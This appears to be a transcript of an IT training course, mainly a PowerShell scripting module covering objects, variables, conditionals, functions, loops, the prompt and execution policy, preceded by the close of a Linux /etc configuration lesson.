Now, where do we turn when we want to get help for our configurations for our ETC configurations? Well we
turn to the man pages or sort for manual pages. So when in doubt, you type the word man followed by the
name of the configuration or command associated with configuration you're looking to get help with. Man
groups is one example, so we type man followed by groups, and it gives us the manual on the groups
command.
We also have man crontab or man fstab to get information on those various services. Now, if you'd like to get a
picture of the entire ETC folder, you could do a CD into /etc on your Linux system and type ls, and It'll give
you a picture of just how configurable Linux and Unix based systems are and all of the different options. And
that conclude this presentation on /etc configurations.
Objectives
So in this course we've examined how to work with management and monitoring tools in the Unix and Linux
environments. We did this by exploring how to securely connect to a remote server. How to work with user
accounts in a Linux system. The elements of an Internet protocol, an IP routing table, and a network interface.
And how to perform domain name system, or DNS, lookups. And the log files for monitoring critical events on
a Linux systems.
Then how to use the ps command to retrieve process information. How to retrieve disk usage, partition
information, and directory contents of a Linux system. How to monitor user and system activity on a Linux
system. How to configure the time and date services, and the system configurations in the etc folder of a Unix
system. Coming up next, we're going to explore identifying malware types and classification approaches.
You'll learn how to use Bash variables, conditionals, and loops and apply timing to a Bash script. You'll also
learn how to change and list directories using Bash scripts, as well as how to change the ownership and
permissions on files and folders. Next, you'll create files and custom functions, use piped commands to chain
Bash scripts together, and redirect outputs using a Bash script.
Table of Contents
Objectives
Objectives
Objectives
Objectives
Objectives
Objectives
Objectives
Objectives
redirect the output of standard out and standard error text in a Bash script
Objectives
You'll learn how to use PowerShell cmdlets, get object properties, and filter inputs. You'll then learn how to
use variables, conditionals, and loops in a PowerShell script. You'll also learn how to get interactive help,
create custom functions, use piped commands to chain PowerShell scripts together, and set the execution
policy using a PowerShell script.
Table of Contents
Objectives
[Video description begins] Topic title: Course Overview. The instructor for this video is Steve Scott. [Video
description ends]
Hi, I'm Steve Scott. I've been a software developer and tech consultant for almost a quarter of a century. I've
traveled around the globe to serve clients, where I've been responsible for building system architectures, hiring
development teams, and solving complex problems.
With my toolbox of Languages, Platforms, Frameworks, and APIs, I round out my technical experience with
an academic background in Mathematics and Computer Science.
In this course, we're going to explore PowerShell scripting, including working with PowerShell objects and
properties, variables, flow control, and looping structures.
I'll start by examining the purpose and use cases for PowerShell scripting. I'll then examine how to work with
different types of PowerShell objects and their properties, as well as PowerShell variables and arrays.
Next, I'll demonstrate how to use flow control, create custom functions, and create loops in PowerShell.
Lastly, I'll run the commands at the PowerShell prompt and explore the runtime environment of a PowerShell
script.
[Video description begins] Topic title: Identifying PowerShell Scripts. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll present some background and motivate the purpose and use cases for PowerShell scripting.
PowerShell is the Shell Command language created by Microsoft for task automation in its Windows
Operating System, with the goal of making command line or console applications much more powerful and
modern. It was also made open source and cross-platform with what's called PowerShell Core, built on top
of .Net Core. Now the old command.com or cmd.exe systems in use in DOS and Windows for the past 40
years needed to be improved to make performing repetitive commands and administrative tasks easier and
more extensible. What it provides is task automation with pipeline-driven outputs and inputs, making it easy to
chain commands together and simplify tasks.
Apart from running shell commands and task automation, the configuration management capabilities of
PowerShell are another important feature. It's what's called a declarative desired state configuration, or DSC. It
also provides command-lets, which are specialized classes for scripting done in a consistent fashion so it's
much easier to get help when you need to find out what a command does or find help on what you're trying to
do.
So what are some of the primary tasks PowerShell is used for? Well, the first is administrative. Being able to
manage Windows systems and programs, its registry and file system is another important aspect.
System administrators can also use it more easily to remotely administer a Windows computer or server,
including tasks that are scheduled to run at a particular time, so you have control over the scheduler via scripts
to configure your systems automatically.
You have network and process tasks that you can manage. So managing connectivity and settings and
monitoring activity, launching and stopping processes, all via script. Access to perform routine tasks on files
and in the file system, including the registry keys and values. And in general, the tasks are all driven by scripts.
So you're writing some code to carry out automation and one of its core capabilities is integrating with the task
scheduler to run at specific times of day or days of the week.
Now PowerShell is also cross-platform; it's not limited to a Windows system. There's a subset of PowerShell
capabilities available on Linux through the PowerShell core. So under Windows, the full capabilities of
PowerShell derive from the .NET Framework, whereas the cross-platform capabilities derive from the features
or functionality exposed by the .NET Core, but it's still a very powerful subset.
In terms of cybersecurity, there are some features we should be automating to improve security. So we start
with monitoring and logging, including automated event detection and log file management. We have file
system security, including access controls and security policy management, so permissions for users and
resources.
But we also have to be aware of PowerShell exploit concerns in terms of cybersecurity – knowing what's going
on in a script, being able to navigate and understand the syntax, being able to spot when untrusted code is
downloaded and run. Remote code execution vulnerabilities do come up. Since it's a common practice to
download scripts from the Internet, being able to audit for security vulnerabilities is essential.
Objectives
[Video description begins] Topic title: Using PowerShell Objects. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to identify some different types of PowerShell objects. I'll share some
common PowerShell command-lets used in everyday PowerShell scripting. I'll select the line of code, and run
one command at a time, so we can talk about the objects in the output as we go.
[Video description begins] A Visual Studio Code window is open to a demo file. A few lines of code are
already present in the Editor window. The Panel area at the bottom of the window is open to the Integrated
Terminal. [Video description ends]
The nice thing about many command-lets is that it's usually easy to figure out what they do – at least in a
general sense – based on the name. Such as Get-Date, for instance.
[Video description begins] The instructor clicks on the first line of code, which reads Get-Date. [Video
description ends]
Obviously, it returns date information, but what information? What does the object return look like? So I can
either use F8 or Run Selection from the toolbar.
[Video description begins] The instructor clicks the Run Selection button in the top-right corner of the
window, and the output is displayed in the Integrated Terminal. [Video description ends]
And in this case, it just gives a string object datetime. So Saturday, July 18th, 2020, 5:21:11 AM, and that's in
UTC time.
Now, exploration is a good way to learn. You can also learn from the Get-Help command-let to display more
detailed information, which is what I'll do for a few commands below. So the format we have is a good human
readable format, but it's not a great format for something we'd like to parse with another program, or if we'd
like to pipe this into another command. It's better to use an object return or to reformat it in ISO 8601
compliant format. So I can use the -Format parameter, with "o" in a string; so in double quotes.
[Video description begins] The instructor types in the code next to Get-Date on the first line of code. [Video
description ends]
And if I run this line of code again, in the output, I get a proper ISO 8601 format. So the 4-digit year, hyphen,
2-digit month, hyphen, 2-digit day, T, and the hour in 24-hour format, to a fractional second, and then the time
zone. So in this case: -7. Now if I want to see what that time zone is, there's this Get-TimeZone command that
I can run.
[Video description begins] The instructor selects the code on line 3, which reads: Get-TimeZone, and then
clicks the Run Selection button. [Video description ends]
And this returns information about the time zone. This object has a number of properties, like the Id and
DisplayName, StandardName, DaylightName, BaseUtcOffset – so in this case, -8 – and
SupportsDaylightSavingsTime: True. If we'd like to generate a random number, we have the Get-Random
command-let.
[Video description begins] The instructor selects the code on line 5, which reads: Get-Randomand then clicks
the Run Selection button, and then clicks the Run Selection button. [Video description ends]
So if I run this – and keep running it – each time I run it, I get a different random number. Now this is a 32-bit
random number – so anything from zero to the maximum 32-bit number.
If we're not sure what it's going to return, we can always use the Get-Help command-let. So Get-Help,
followed by the command we'd like to run.
[Video description begins] The instructor highlights part of the code on line 6, which reads: Get-HelpGet-
Random -Online. [Video description ends]
And we can use it locally; so if I select Get-Help Get-Random, I can actually copy that, and put it in the
terminal window at the bottom – paste it in – and in this instance, it gives me some basic information – the
name, the syntax – but it doesn't give me some detailed information. And in this case, I don't have the full help
file set locally but I can use the Get-Help Get-Random online. So I can put -Online – like I have in line 6 – and
I run it, it'll open it up in a browser window, and go right to the Microsoft documentation pages, and pull up
this command-let.
So Get-Random, and it has all the detail, the description, and as I mentioned, it's a 32-bit unsigned integer from
zero to MaxValue of an int32, so a 32-bit int, which is slightly over 2.1 billion. And the nice thing here: it has
some examples. We can specify a maximum; so Get-Random -maximum 100. So we can copy the code right
from the documentation. Either paste it into the terminal to test it, or if we'd like to use it in our code, we can
also paste it right into our code, and save it into our script, and run it from there. And again, each time I run,
the Get-Random function returns a different number.
We can also get process information. Now I have running, in another window, the built-in Calculator and if I
run a Get-Process on Calculator, it's gonna give me process information.
[Video description begins] The instructor clicks on the code in line 9, which reads: Get-Process
Calculator. [Video description ends]
So, let's go over the information that that gives us. So it gives us the number of Handles that the process has
opened, the NPM – the Non-Paged Memory that the process is consuming – the Pageable Memory that the
process has, the Workspace Memory – so the recently referenced pages of memory – so the amount of
processor time it's used: 1.22 seconds, the process ID or PID: 9152, and the ProcessName: Calculator.
You could also add some other parameters onto this. I can also put IncludeUsername to find out the process
owner.
[Video description begins] The instructor types in -IncludeUsername next toGet-Process Calculator on line 9,
and then clicks the Run Selection button. [Video description ends]
But we get some red text which is not good in the terminal window. This brings up an important consideration
when running PowerShell scripts. In this case, the IncludeUsername parameter requires elevated user rights.
Try running the command again in a session that has been opened with an elevated user rights; that is run as
administrator. Now I'll get into this more in the video titled 'PowerShell Execution', so we'll leave it as is for
now.
One of the important and powerful features of PowerShell and other scripting languages is being able to pipe
the output from one command into another command. So here on line 12, I have Get-Service. Then the output
of Get-Service we say is piped in to Out-GridView.
[Video description begins] The code on line 12 reads: Get-Service | Out-GridView. [Video description ends]
So there's a pipe character in between the two command-lets and the Out-GridView is going to take the input
from Get-Service, and display the results in a separate GUI. So it's going to open up interactive window, and
we can use to display the results, and interact with the results in some cases.
So if I run the Get-Service piped into Out-GridView, we get a window open up, and it shows the command in
the title bar, and we see all of these services: the Status, the Name and the DisplayName of all these services –
running, stopped and their states. And we can filter some of this by Name or by DisplayName so we can search
within this grid view. So it's quite handy to have in a GUI environment if you want to interact and display
some tabular results. So I'll close that, and now the last one.
Now, of course, this wouldn't be complete if I didn't display the command-let for Get-ChildItem. Now this one
seems a little bit strange – Get-ChildItem – but it's actually displaying the contents of a particular directory, so
we can do Get-ChildItem, -Path of C:\. Now I'm going to copy just this part of it out, paste it into the terminal,
and run it as is. So it gives the ACL list: the Mode of the file, the LastWriteTime, the Length, and the Name.
Now we can also interact with this and sort it. And if we pipe the command, the contents of this C:\ – the root
directory – I'm going to pipe this into Sort-Object, and specify the Property. So -Property of the
LastWriteTime, and I'm going to put it in descending order, so I specify -Descending.
[Video description begins] The instructor clicks on the code on line 14, which reads: Get-ChildItem -Path C:\
| Sort-Object -Property LastWriteTime -Descending, and then clicks the Run Selection button. [Video
description ends]
Now if I run this command, now I get the same output but the dates go from the most recent to the oldest in
that sorted order.
And that concludes this demonstration of common PowerShell objects.
Objectives
[Video description begins] Topic title: Exploring PowerShell Properties. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll explore how to work with PowerShell Object properties. So on line 1, I have a Get-ChildItem
command-let, followed by hyphen path and a period. This gives us a directory listing in the form of a
PowerShell object that we pipe into the Sort-Object that sorts on the Length. And -Descending to the sort in
descending order. Then we pipe in the results into Format-Table. So we have a nice chain of PowerShell
command-lets here; all pipe from one to the next. The format table formats the output to be displayed so that
we can limit the number of properties that are shown in the output. Like I've done here with the -Property and
the column names Name and Length.
[Video description begins] The first line of code reads as follows: Get-ChildItem -Path . | Sort-Object Length -
Descending | Format-Table -Property Name, Length. [Video description ends]
So I'm going to run this first line of code on its own. And in the result, we get a directory listing from the
current directory. And the files that are in it, and the length of each of those files sorted in descending order of
length – so the number of bytes in each file.
The next example of getting properties in PowerShell is using Get-Date. I assigned Get-Date to the variable $d
on line 3, then on line 4, I call d.Get-Type() to verify the object's type.
[Video description begins] The code on line 4 reads: $d. Get-Type() [Video description ends]
Then, just $d on its own, to see the entire contents of the variable on line 5, and then on line 6, I piped $d into
Select-Object, which lets me specify the properties I'd like to extract from the date, namely the year, the
month, and the day. [Video description begins] The code on line 6 reads as follows: $dSelect-Object Year,
Month, Day. [Video description ends] So I'll highlight these four lines of code – from lines 3 to 6 – run the
selection, and let's have a look at the output.
So in the output, the first thing is the Get-Type, so it's a DateTime type. And then the contents of DatetTime
has things like the full date, the day, the day of the week, the day of the year, hour, the number of milliseconds,
minutes, months, second, ticks, time of day, year, et cetera. So there's all this data information stored in this
object and we extract the year, the month and the day. So in the output, we have year, month, day – the last
thing printed from the contents of line 6, where we did the Select-Object.
Then I'm going to extract some properties from a single file. So instead of specifying an entire path to read
files from, I'm going to call Get-ChildItem with the local file.txt that's in my current directory, that just has the
text: Hello, World!
[Video description begins] The code on line 8 reads as follows: $f = Get-ChildItem ".\file.txt" [Video
description ends]
What I'm going to extract, the property I'm going to extract here, is the length. So on line 9, I have $f that I
pipe into Format-List and then I extract the property, so -Property with Length, and then I output $f. So I'll
highlight these three lines of code, run the selection, and we get the results. So the Length is 13 that we
extracted and the contents of it gives us the file Mode, the LastWriteTime, the Length, and the Name.
In the last example, I'm going to demonstrate using a Where clause to filter properties based on a simple
regular expression. So on line 12, I have Get-Process, so this is going to get the running processes. It's going to
pipe it into Select-Object, which selects the ProcessName and Id, which gets piped into the Where-Object, and
then inside of braces I take the input from the previous command – so what comes before the pipe – and
reference it using $_.ProcessName.
So I'm going to take the ProcessName, do a -match, and give it the regular expression ^Calc.*. So this is going
to extract any processes that start with Calc.
[Video description begins] The code on line 12 reads: Get-Process | Select-Object ProcessName, Id | Where-
Object { $_.ProcessName -match "^Calc.*" } [Video description ends]
So since I have the calculator running, it should find one. So I'm going to run this line of code. And in this
case, it gives me Process Name Calculator and ID 9152.
Objectives
[Video description begins] Topic title: Using PowerShell Variables and Types. The instructor for this video is
Steve Scott. [Video description ends]
In this video, I'll demonstrate some different types of PowerShell variables and arrays, and some of their
important behaviors.
So we'll start out in the script on line 1. I have $sum = 2 + 3. So, this is a basic numeric sum. And I'll run the
code. And so we've assigned the sum variable. And on line 2, I've Write-Output of $sum. And that gives me
the answer 5. That's pretty much expected. We could also get some information about the object itself by using
the Get-Member commandlet. So on line 3, I have $sum | Get-Member. I'll run it, and let's have a look in the
output of the terminal.
So there's some information here: It gives me the TypeName – in this case System.Int32 – so it's a 32-bit end,
and it gives me the Name, the MemberType and the Definition – the basic definition of the Member Methods
that this object has. So this is an Int object with things like conversion ones to convert it to different types of
numbers – ToDecimal, ToDouble, ToChar, ToDateTime. It also has some handy functions, like GetType,
GetHashCode and Equals functions so it can be compared to other objects of the same type. So we can tell a
lot of information about objects by using Get-Member.
Now I'll run the next block of code. So if I highlight lines 5, 6 and 7— So Line 5 has sum – or $sum, so we're
going to reassign it – equals – in single quotes I have – 1 plus – and then 1 in single quotes again. So we're
dealing with two strings. Then I do a Write-Output of $sum, and $sum | Get-Member again. So if I highlight
these three lines, and run, it will run that whole selection all at once. So I'll scroll up in the output, and I get a
little bit more information. The actual result – what it gets written – is 11. So 1 + 1 is 11.
And we're not adding them together, but we're concatenating them. So we can concatenate string types in
PowerShell using the plus operator. And the TypeName, in this case, shows System.String and then it shows
all the Member Methods to do with string in the output when we run Get-Member.
Now we can be explicit about the type. We can strongly type our variables if we put the type name in square
brackets before the variable name when we declare it. So on line 9 – in square brackets – I have int, $a = 1. On
line 10, I have string – in square brackets – $b equals the string 2. Then on line 11, I have – in square brackets
– double, $c = 3.14.
Now let's do a few operations with these. So the first one, on line 13, is $sum = $a + $b + $c. So I'm going to
highlight lines 13, 14 and 15. So line 14 is Write-Output of $sum, and line 15 displays the Type with
$sum.GetType(). So I'll highlight the commands on lines 9, 10 and 11. I'll assign these variables a, b and c –
$a, $b and $c – and then on line 13, I have $sum = $a + $b + $c. So let's see how it handles these mixing types
with the plus operator when we're dealing with ints, strings and doubles.
So I'll highlight line 13, line 14 – where I do Write-Output $sum, and line 15 – $sum.Get-Type() – which will
return the type of sum. And in this case, the sum gives me 6.14. So we have 1, which is an Int, and then we're
adding 2 to an Int type. Now PowerShell will take that string with the number 2 in the string and convert it to
an Int. It'll try to cast it or convert it to an Int to add to the other Int, but then it gets to the $c, and sees we have
another numeric value, but it's a double, so it takes the Int value that it has at that point – after adding a and b –
converts it to a double, and adds 3.14.
So it converts it to the higher precision numeric type. And what comes on the left is very important – So the $a
coming first is significant. And the resulting value – so the resulting type is a double.
Now let's do something similar, but let's switch the order of $b and $a as variables in the sum. So on line 17, I
have $sum = $b – so the string first – plus $a plus $c. Then I do a Write-Output of $sum, and then get the Type
of sum – in this case, with $sum.GetType(). So if I run this, then in the terminal window, I have 213.14. So it
looks like 213.14, but in this case, it takes the string b, and decides we're working with a string type, and then
plus a – even though a is an Int – it concatenates it onto the tube, so at that point we have 21. And then plus c is
3.14, and then it puts the 3.14. So it does a full string concatenation. So we get 213.14 as a string, and the Type
in this case does show String.
Now let's talk about some simple arrays. So on line 22, I have an array that I declare – $L, and I set that equal
to the list of values: 1, 2, 3, 4, 5. Now this will create an array of five elements from 1 to 5. Now I can do the
same thing: $L = 1..5. Now, if I wanted to go from 0, I could do that as well – 0..5, but if I want $L to be the
equivalent, but I want to use the shorthand notation, I can use 1..5, and it will fill in all the values from 1 to 5.
And then on line 24, I do Write-Output of $L, and in square brackets, 4. So I'm getting the 4th element, and
we'll see what that does. So let's run line 23. And then line 24 to write the output. And we get 5. Arrays in
PowerShell are zero-based, so we index the array from 0 to 4 even though our values go from 1 to 5.
We could also do an array of strings. So on line 27, I have $V equals the string "Hello", "World", "ok", "Bob".
And in this case, I'm going to write the output of $V index – in square brackets – at 1. And that returns World.
So this clearly shows that the index of 1 is World, and the index of 0 is Hello. So I could actually just change
that from a 1 to a 0, and Write-Output of $V index at 0, and that gives me Hello. Now I can also just put it on a
line by itself.
In this case, instead of using Write-Output, I can just put $V of 1 on a line by itself, and it will get the same
thing. PowerShell knows to display the contents of the array at that point. Now what if I just put $V? What
does it show? It gives me the entire contents of the array with each element on a line by itself.
Objectives
[Video description begins] Topic title: Using PowerShell Conditionals. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to use flow control in PowerShell. So by flow control, I mean conditional
statements – if statements or if ... else-if ... else statements.
I'm going to go through a few examples here to demonstrate a few different ways you can use if statements. So
I'll start out in line 1 with the basic if statement. So I have the word if and then, in parentheses, I have the
Command-let Test-Path, and then in a string, I have "file.txt." So Test-Path tests if the file exists. So since I'm
specifying just the filename and not the full path to the file, it's going to check relative to where I am, so in my
current folder.
So just by inspection here in my current folder, there is a file called "file.txt" and it just has a string in it called
"Hello, World!" [Video description begins] The instructor selects the tab file.txt besides demo_06.ps1 to show
the string and he comes back to the same tab again. [Video description ends] So it should discover this file and
that it does exist and it will output the string "File Exists." So the code that's executed as part of this if
statement comes in between the braces. So this is called the if block. So anything between the open and closed
brace gets executed.
Here I only have a single line that outputs "File Exists." Let's test this now. So I'll highlight the first 4 lines of
code including the open and closed braces, and then I'll run the current selection. And in the output, we get the
string "File Exists." Now it does show the actual code that gets processed and then the result of the code all in
this PowerShell terminal. Now I'll move down to line 6 and 7, where I assign 2 variables that I'm going to use
in the next block.
So on line 6 I have $x = 99 and $y = 3. And then starting on line 9, I have if and then in parentheses, $x and
then -gt, which means greater than. So we're looking for the condition x > y. And if this is true, it outputs the
string x and then the greater than symbol y and then on line 11,
I closed the braces around the first part of the if. And then I put in elseif (all one word) and then parentheses,
the condition that gets checked if the first condition fails. So in this case, it takes $x -lt $y. So it's checking if
the x variable is less than the y variable. And then if it is, I output x < y. So, the less than symbol. Again, each
block is surrounded by braces, then else, and then another break, open and close brace block with x must be
equal to y. It's stating this as a fact with an exclamation mark.
So the else block gets executed only if x is not greater than y and x is not less than y. So the only other possible
condition is that it must equal y. Then on line 17, I create a string variable s. So $s equals the string "Hello,
World!" And then on line 19, I say if and then in parentheses, $s -like. So this is going to compare it with a
wildcard. So I have, in single quotes, 'world,' but I have an asterisks in front of it.
So this is a wildcard so that if the string contains "World." So *World.* So if it's anywhere within the string,
this condition will be true. So I have the output "string contains world." And then the if block ends with a
closing brace. So I'll go back up and I'll execute the assignment of x and y, and assign the variables x is 99 and
y is 3. And then I'll highlight the if-else block from lines 9 to 15 and execute those on their own.
And in this case, it outputs x > y. Because x is 99 and y is 3. I can change those variables. Let's say we make
x=9 and y=33. I highlight those lines of code, run them again, so I reassign the variables, highlight the if block
and I get x < y. Now I'll set them to be the same. So we can check all branches of this if statement, reassign the
variables, and check the if block again. In this case, it prints x must equal y!
And now I'll select all of the code at the end with the $s="Hello, World!" and checking if s is like *World* So
checking if world is in the string, and it should be, and it does print string contains World. And that concludes
this demonstration of PowerShell conditionals.
[Video description begins] Topic title: Creating PowerShell Functions. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how custom functions are created in PowerShell. So on line 1, I defined a
function using the function keyword and then the name of the function. So the name of the function should use
the same verb-noun convention that's used throughout PowerShell. So in this case, I've called it Show-
Greeting. And then inside the braces, the open and closed braces from lines 1 to 16, is the definition of the
function itself. Only a process block is technically required, but the other ones are available as well. So that on
line 2, I defined the parameters.
So this is to handle arguments passed into the function. So I have param and then in parentheses, on the next
two lines, I define two parameters, a string surrounded in square brackets. So I define the type $greeting, and
then on the next line, I have string and square brackets, followed by recipient. So it's going to take a greeting
and a recipient and then put them together. Then on line 6, I have a begin. So this gets executed before the
function is processed. So at the very beginning, when the function is called, I write output just the string
"Function beginning."
So you can have some initialization and initialization step, then a process method and an end. So the process is
the most important one. So on line 9, I have process and then in braces on the next two lines 10 and 11, I've
write-output and the strings "Piped data:" and then a $_. Now there's two ways you can pass data into
functions. Either through an object that's piped into the function, which is the $_, that's how it's received. Or as
a parameter passed into the function, a named parameter like greeting and recipient.
So I also write output of the string and then inside the string, I have "$greeting, $recepient!" And then the end
method gets called after the function is processed before it returns, we get the "function end" that will get
printed to the console. And then I put a little comment here. #Show-greeting, to show that this block is the end
of the function. Then on line 18, I call the function #Show-Greeting. But I have the string "value" that I pipe
end of the function. So I have "Value" | Show-Greeting, then -greeting, followed by the string "Hello" -
recipient, followed by the string "World."
Now I'm gonna highlight the entire function, press the run selection command, and then highlight the code on
line 18, where Show-Greeting is called. So we make sure that the function is defined by executing the block of
code that defines it, and then I execute the code that calls it. And then in the output, Function beginning, Piped
data: value, Hello World!, Function end.
So I went through each of the steps and value gets passed in in the $_ variable. Now on line 20, I have Show-
Greeting then -greeting "Hi" -recipient "Bob" and then three parameters 1 2 3. But nothing is done with those,
because there's nothing in the function to handle them. So they get ignored. So we have Function beginning
Piped data: nothing, Hi, Bob, and then Function end. And that concludes this demonstration of how to create a
PowerShell function.
Objectives
[Video description begins] Topic title: Using PowerShell Loops. The instructor for this video is Steve
Scott. [Video description ends]
In this video, I'll demonstrate how to create a for, a foreach and a while loop in PowerShell. So in this code on
line 1, I start with the basic for loop. So this for loop has three statements within it. So in parentheses, the first
clause before the first semi-colon is an initializer. So we initialize the loop variable, $i = 1. Then in the middle
we have the condition.
The loop will continue as long as this condition is true. So $i -le for less than or equal to 10. So this will loop
until the i equals 10. And then there's another semi colon, followed by the loop increment. And in this case, I
have $i++ to increment the loop variable by 1 on each iteration. And then the body of the loop is enclosed in
braces And this loop, all it does is output the variable i. So, we'll get it on the screen. So what I'll do is, I'll
highlight these 4 lines of code and run the selection and we'll have a look at the output. And we get the output
from 1 to 10.
Now let's do a foreach loop. So, on line 6, I create a variable, an array called value. So $values equals a string
'A', 'mixed', 5, 'array,' the literal string 'array' (in single quotes), 9, 'values.' So there's a mixed array of values
with some strings and some numbers, and we're going to take a foreach loop. So foreach is the keyword, and
then in parentheses, we get the loop variable. So $s with the string 'in' $values. So we're taking the variable that
we're going to use on each iteration of the loop that will take the next value.
So it will start with A and the loop will continue until it reaches the end of the loop for the actual string
'values.' And then on each iteration inside of the braces, it's going to have Write-Host of $s. So it's going to use
the Write-Host function to write the variable. Now we could write it just by putting the variable underlined by
itself, or we could use Write-Output, or we can use Write-Host. So there's different ways to output values.
Write-Host is often used when we want to add color or some other formatting to the output.
So, let's highlight these lines of code from where we initialize the values and the loop itself. So I'll run this
selection. And we get the loop printing A mixed 5 array 9 and values, as expected. And now for the final loop,
we have $j. So this variable j is initialized to be equal to 40. Then I have the while and in parentheses, the
condition for the loop to run.
Now in this case, it only has a single condition. So we have to make sure there's always a chance for this
condition to be true or some other way to break out of the loop, like using the break statement. So in this case
in parentheses, we have $j -gt for greater than 0. Since J starts out at 40, we want to make sure that j is
decremented or the value is decreasing so that it will eventually hit 0.
So in the first step of the loop inside of the main braces for the while loop, we have $j--. This will decrement
the value of J by 1. And then $j underlined by itself, which will output the value j. Then inside of the loop on
line 17, I have if and in parentheses, I have $j % 7. So the percent symbol for the modulus operator -eq 0. So if
j % 7 is equal to 0, it means the value j is divisible by 7.
And if it is, I put a condition in here to demonstrate the break statement, which will take us out of the loop at
that point without continuing the iteration. So regardless of whether or not the condition is still met, it breaks
and exits the loop. So, I'll select all of the code from the loop and the initialization of the $j variable to 40. I'll
execute it. And in the output we get, 39, 38, 37, 36, and 35. So when it reaches 35, it checks to see if it's
divisible by 7, and because 7 * 5 is 35, it is divisible by 7. So it breaks out of the loop. And that concludes this
demonstration of PowerShell loops.
Objectives
[Video description begins] Topic title: Working With the PowerShell Prompt. The instructor for this video is
Steve Scott. [Video description ends]
In this video, I'll demonstrate how to run commands at the PowerShell command prompt. This is also called a
REPL environment - A Read, Evaluate, Print Loop and it's very good for exploration, discovery and testing. So
I have PowerShell opened here, which you can open from the menu. It comes installed with Windows 10 and
when you open it, you can start running PowerShell commands right from the command prompt.
First thing I'll do is check the version. So I'll print the $PSVersionTable. And if you partially write a command
and hit tab, it will autocomplete the command for you. So in this case I have the version information, printed. I
can also run commands like I did in other videos in this series, like Get-Date. And it displays the results from
the command prompt. Let's have a look at the path of the current folder. So I'll type Get-ChildItem -Path .
which will give me the contents of the current folder.
So there's a number of PowerShell scripts and a text file called "file.txt." What I'm going to do is run in one of
these scripts. If I want to run a script from the current folder, I do ./ or .\ and then demo and let's say, 09.ps1.
Then I get the result "Hello World" from this file. So we can run scripts from the command prompt and we can
get the contents of a file. So if I do get content and specify in a string "file.txt", it gives me the contents of
file.txt, which also has "Hello, World!"
We can also get help by running Get-Help. So let's do a get help of Get-Content, and it prints the contents of
Get-Help right here from the command prompt. Much in the same way on a Linux system, if you're running
the manual pages using the man command for manual, where you can get the help file as well. We can also
create files if I do New-Item -Path, let's call this test.txt, then -ItemType File. And now if I do Get-ChildItem
with Path .
I can see the new file "test.txt" created with a length of 0. So it's an empty file, but we've created it. I can
remove the file using Remove-Item "test.txt." And if I type Test-Path, now with test.txt. It returns false
because the file doesn't exist. Now if I want to do that with Test-Path "file.txt", it returns true because that file
is there. Now other than the PowerShell command prompt, there's also a utility called the PowerShell ISE - the
Integrated Scripting Environment. But it's no longer in active development by Microsoft.
Now I'll switch over. I have it open here. Now it is quite handy to use because it has all of the commands in the
listing along here on the right-hand side that I can use.
[Video description begins] The instructor switches to the Windows PowerShell ISE, which is already opened
in his machine. [Video description ends]
The current recommendation from Microsoft is to replace this environment with Visual Studio code with a
PowerShell extension, like I've been doing with other videos in this series. But if I type a command, say, Get-
Help or Get-History, there's all I can actually start typing and it gives me a menu and I can arrow up through
this menu. And it has autocomplete, but it also has a nice menu showing the possibilities that I can use to
complete it.
It's quite a handy environment, but the recommendation is to go into PowerShell. And inside of PowerShell,
there's also a terminal section with the integrated PowerShell console.
[Video description begins] Again, he switches back to the PowerShell. [Video description ends]
And you can type your commands in here. If I type in .\demo_09.ps1. And it prints "Hello world!" So there are
many options to use PowerShell from a prompt or a rappel that we can use for exploration discovery and
testing, along with active development like we do here in Visual Studio code. And that concludes, this
demonstration of the PowerShell prompt.
[Video description begins] Topic title: Setting PowerShell Execution Policy. The instructor for this video is
Steve Scott. [Video description ends]
In this video, I'll demonstrate how to explore the runtime environment of a PowerShell script. The most
important aspect of this is the execution policy. We can restrict or limit execution of scripts, so that we can
limit the possibility of a security incident. First, we'll check the execution policy with the command-let get
execution policy. I have Visual Studio Code open and I'm in the PowerShell Integrated Environment. So in this
terminal section I type Get-ExecutionPolicy.
And at the moment it's set to restrict it, which means that by trying to execute a script, it's going to fail. So
open in PowerShell I have this demo_10.ps1. If I try to execute this script, it gives me an error. So it says the
script's name cannot be loaded because running scripts is disabled on this system. So you need to enable it by
setting the execution policy. Now, one way I can see the execution policy in a little bit more detail is typing
Get-ExecutionPolicy -List.
So it shows some more details, so there's machine policy, user policy, process, current user and local machine.
Now the main ones are the process, current user, and local machine, which are currently all set to restricted.
Now the default is a restricted policy. But a balanced approach is either an AllSigned or RemoteSigned. So
whether all scripts need to be signed or just remote ones. An unrestricted policy runs all of your local scripts.
But for scripts that are downloaded, say from the Internet, you are warned and ask for permission before
running. There's also an execution policy called bypass. That has the least restrictions. So there's no blocks and
no warnings. And you should never use the bypass restriction policy, at least never enter production nor an
operational environment. But in any case, you're better off going with a balanced approach that requires some
scripts to be signed.
So I'm gonna go to search and type in powershell and right-click on Windows PowerShell, and run as
administrator. To change the policy to set it, we actually need to run as an administrator. So I've opened up
PowerShell as an admin.
[Video description begins] The instructor opens the PowerShell terminal. [Video description ends]
And I'm going to type Set-ExecutionPolicy then -ExecutionPolicy for the argument, and I'm going to set it to
RemoteSigned. And then I'm gonna set the scope to current user. Yes. Now if I go back to Visual Studio Code,
and re-run Get-ExecutionPolicy -List, it changes current user to remote signed.
[Video description begins] He switches back to the Visual Studio Code terminal. [Video description ends]
Now I'm also going to set the same one on the scope of the local machine.
[Video description begins] He again switches to the Windows PowerShell. [Video description ends]
But if I go back to Visual Studio Code and check the execution policy, process is still set to restrict it. So I
want to close Visual Studio Code and re-open it. And now from the integrated PowerShell terminal, if I type
Get-ExecutionPolicy -List, it shows remote signed. So if I try to run demo_10.ps1, it works and I get the result
"Hello, World!" So there's no errors. There's no warning. And the execution policy has been updated
successfully. And that concludes this demonstration of PowerShell execution policy.
Objectives
[Video description begins] Topic title: Course Summary. The instructor for this video is Steve Scott. [Video
description ends]
So in this course, we've examined PowerShell scripting techniques, including working with objects, variables,
flow control and loops. We did this by exploring the purpose and use cases for PowerShell scripting. How to
work with different types of PowerShell objects and their properties? How to work with PowerShell variables
and arrays? How to use flow control, create custom functions and create loops in PowerShell? How to run
commands at the PowerShell prompt? And the runtime environment of a PowerShell script.
In our next course, we'll move on to explore Python scripting, including how to work with variables, loops,
functions, file operations, and web URL requests.
Table of Contents
Objectives
identify the purpose of and use cases for various Python scripts
Objectives
Objectives
assign basic values to variables and containers, such as lists, dictionaries, and tuples, in a Python
script
